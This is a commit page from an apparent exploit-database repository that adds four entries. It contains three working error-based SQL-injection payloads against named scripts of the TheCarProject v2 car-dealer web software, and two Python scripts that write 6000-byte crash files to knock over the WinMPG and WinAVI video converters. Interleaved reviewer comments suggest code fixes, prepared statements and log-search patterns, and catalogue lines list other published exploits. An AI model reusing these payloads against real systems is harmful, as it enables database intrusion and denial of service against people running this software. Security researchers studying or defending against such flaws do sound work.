DB: 2019-03-19
4 changes to exploits/shellcodes WinMPG Video Convert 9.3.5 - Denial of Service WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 - Denial of Service BMC Patrol Agent - Privilege Escalation Code Execution Execution (Metasploit) TheCarProject v2 - Multiple SQL Injection
parent
5981a27702
commit
2a394cba09
5 changed files with 1277 additions and 0 deletions
1133
exploits/multiple/remote/46556.rb
Executable file
1133
exploits/multiple/remote/46556.rb
Executable file
File diff suppressed because it is too large
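--- /dev/null
+++ b/exploits/php/webapps/46555.txt
@@ -0,0 +1,83 @@
+===========================================================================================
+# Exploit Title: TheCarProject v2 - 'man_id' SQL Inj.
+# Dork: N/A
+# Date: 17-03-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: https://thecarproject.org/
+# Software Link: https://sourceforge.net/projects/thecarproject/
+# Version: v2
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: A fully Featured Auto vehicle, Auto Dealer php
+sales web site software
+built on Bootstrap 3 it will present the best possible viewpoint for
+your customers
+unlimited items, unlimited images per item. Totally driven from the
+admin side of the site.
+===========================================================================================
+# POC - SQLi
+# Parameters : man_id
+# Attack Pattern :
+-1+or+1%3d1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)
+# GET Method : http://localhost/TheCarProject/cp/includes/loaditem.php?man_id=-1
+or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT
+COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x
+FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
+===========================================================================================
+###########################################################################################
+===========================================================================================
+# Exploit Title: TheCarProject v2 - 'car_id' SQL Inj.
+# Dork: N/A
+# Date: 17-03-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: https://thecarproject.org/
+# Software Link: https://sourceforge.net/projects/thecarproject/
+# Version: v2
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: A fully Featured Auto vehicle, Auto Dealer php
+sales web site software
+built on Bootstrap 3 it will present the best possible viewpoint for
+your customers
+unlimited items, unlimited images per item. Totally driven from the
+admin side of the site.
+===========================================================================================
+# POC - SQLi
+# Parameters : car_id
+# Attack Pattern :
+-1+or+1%3d1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)
+# GET Method : http://localhost/TheCarProject/cp/info.php?man_id=3&car_id=-1
+or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT
+COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x
+FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
+===========================================================================================
+###########################################################################################
+===========================================================================================
+# Exploit Title: TheCarProject v2 - 'man_id' SQL Inj.
+# Dork: N/A
+# Date: 17-03-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: https://thecarproject.org/
+# Software Link: https://sourceforge.net/projects/thecarproject/
+# Version: v2
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: A fully Featured Auto vehicle, Auto Dealer php
+sales web site software
+built on Bootstrap 3 it will present the best possible viewpoint for
+your customers
+unlimited items, unlimited images per item. Totally driven from the
+admin side of the site.
+===========================================================================================
+# POC - SQLi
+# Parameters : man_id
+# Attack Pattern :
+-1+or+1%3d1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)
+# GET Method : http://localhost/TheCarProject/cp/item_listing.php?man_id=-1
+or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT
+COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x
+FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
+===========================================================================================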
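Review bot: The advisory lists three injection points but gives no root cause or remediation, and the first and third entries carry the same title ('man_id') although they name different scripts (`loaditem.php` and `item_listing.php`); each title should include the script name so the entries can be told apart. A line such as `# Fix: bind man_id / car_id as prepared-statement parameters (or cast to integer) and do not return database error text to the client` in each entry would make the record usable for remediation. The pattern shown appears to depend on a database error being echoed back to the requester (inferred from the `GROUP BY` over `FLOOR(RAND(0)*2)`), so requests to these three scripts that carry `INFORMATION_SCHEMA` or `FLOOR(RAND(` in `man_id` or `car_id` are a reasonable thing to search for in web-server logs.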
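--- /dev/null
+++ b/exploits/windows/dos/46553.py
@@ -0,0 +1,29 @@
+# Exploit Title: WinMPG Video Convert Local Dos Exploit
+# Date: 15.03.2019
+# Vendor Homepage:http://www.winmpg.com
+# Software Link: http://www.winmpg.com/down/WinMPG_VideoConvert.zip
+# Exploit Author: Achilles
+# Tested Version: 9.3.5 and older ones
+# Tested on: Windows XP SP3 EN
+
+
+# 1.- Run python code :WinMPG.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open WinMPG.exe and Click 'ALL-AVI'
+# 4.- In the new Window click Register
+# 5.- Paste the content of EVIL.txt into the Field: 'Name and Registration Code'
+# 6.- Click 'Register'and you will see a crash.
+
+
+
+#!/usr/bin/env python
+buffer = "\x41" * 6000
+
+try:
+f=open("Evil.txt","w")
+print "[+] Creating %s bytes evil payload.." %len(buffer)
+f.write(buffer)
+f.close()
+print "[+] File created!"
+except:
+print "File cannot be created"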
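Review bot: The bare `except:` around the file write hides the real failure (permissions, full disk, even a keyboard interrupt) behind "File cannot be created", and `f.close()` is skipped if `f.write` raises; `with open("Evil.txt", "w") as f:` together with `except IOError as e:` that prints `e` would fix both. The `#!/usr/bin/env python` line sits below the comment header rather than on line 1, so it has no effect as a shebang, and the `print` statements make the file Python 2 only, which the header should state. The header steps refer to `WinMPG.py` and `EVIL.txt` while the script writes `Evil.txt`, so the names should be made consistent. The same points on error handling, shebang placement and Python version apply to exploits/windows/dos/46554.py.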
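--- /dev/null
+++ b/exploits/windows/dos/46554.py
@@ -0,0 +1,28 @@
+# Exploit Title: WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 Local Dos Exploit
+# Date: 16.03.2019
+# Vendor Homepage:http://www.winavi.com
+# Software Link: http://www.winavi.com/user/download/WinAVI_iPod_3GP_MP4_PSP_Converter.exe
+# Exploit Author: Achilles
+# Tested Version: 4.4.2
+# Tested on: Windows XP SP3 EN
+# Windows 7 x64 Sp1
+
+
+# 1.- Run the python script, it will create a new file with the name "Evil.avi"
+# 2.- Open WinAVI.exe and Click 'Convert to iPhone'
+# 3.- Load the file "Evil.avi"
+# 4.- And you will see a crash.
+
+
+
+#!/usr/bin/env python
+buffer = "\x41" * 6000
+
+try:
+f=open("Evil.avi","w")
+print "[+] Creating %s bytes evil payload.." %len(buffer)
+f.write(buffer)
+f.close()
+print "[+] File created!"
+except:
+print "File cannot be created"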
|
@ -6356,6 +6356,8 @@ id,file,description,date,author,type,platform,port
|
|||
46533,exploits/windows/dos/46533.txt,"Microsoft Windows - '.reg' File / Dialog Box Message Spoofing",2019-03-13,hyp3rlinx,dos,windows,
|
||||
46534,exploits/windows/dos/46534.txt,"Core FTP Server FTP / SFTP Server v2 Build 674 - 'MDTM' Directory Traversal",2019-03-13,"Kevin Randall",dos,windows,21
|
||||
46535,exploits/windows/dos/46535.txt,"Core FTP Server FTP / SFTP Server v2 Build 674 - 'SIZE' Directory Traversal",2019-03-13,"Kevin Randall",dos,windows,21
|
||||
46553,exploits/windows/dos/46553.py,"WinMPG Video Convert 9.3.5 - Denial of Service",2019-03-18,Achilles,dos,windows,
|
||||
46554,exploits/windows/dos/46554.py,"WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 - Denial of Service",2019-03-18,Achilles,dos,windows,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
|
@ -17255,6 +17257,7 @@ id,file,description,date,author,type,platform,port
|
|||
46543,exploits/windows/remote/46543.py,"FTPGetter Standard 5.97.0.177 - Remote Code Execution",2019-03-14,w4fz5uck5,remote,windows,
|
||||
46544,exploits/multiple/remote/46544.py,"Apache UNO / LibreOffice Version: 6.1.2 / OpenOffice 4.1.6 API - Remote Code Execution",2019-03-14,sud0woodo,remote,multiple,
|
||||
46547,exploits/windows/remote/46547.py,"Mail Carrier 2.5.1 - 'MAIL FROM' Buffer Overflow",2019-03-15,"Joseph McDonagh",remote,windows,25
|
||||
46556,exploits/multiple/remote/46556.rb,"BMC Patrol Agent - Privilege Escalation Code Execution Execution (Metasploit)",2019-03-18,Metasploit,remote,multiple,3181
|
||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
@ -40995,3 +40998,4 @@ id,file,description,date,author,type,platform,port
|
|||
46549,exploits/php/webapps/46549.txt,"Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities",2019-03-15,"Gionathan Reale",webapps,php,80
|
||||
46550,exploits/php/webapps/46550.txt,"Laundry CMS - Multiple Vulnerabilities",2019-03-15,"Mehmet EMIROGLU",webapps,php,80
|
||||
46551,exploits/php/webapps/46551.php,"Moodle 3.4.1 - Remote Code Execution",2019-03-15,"Darryn Ten",webapps,php,80
|
||||
46555,exploits/php/webapps/46555.txt,"TheCarProject v2 - Multiple SQL Injection",2019-03-18,"Mehmet EMIROGLU",webapps,php,80
|
||||
|
|
Can't render this file because it is too large.
|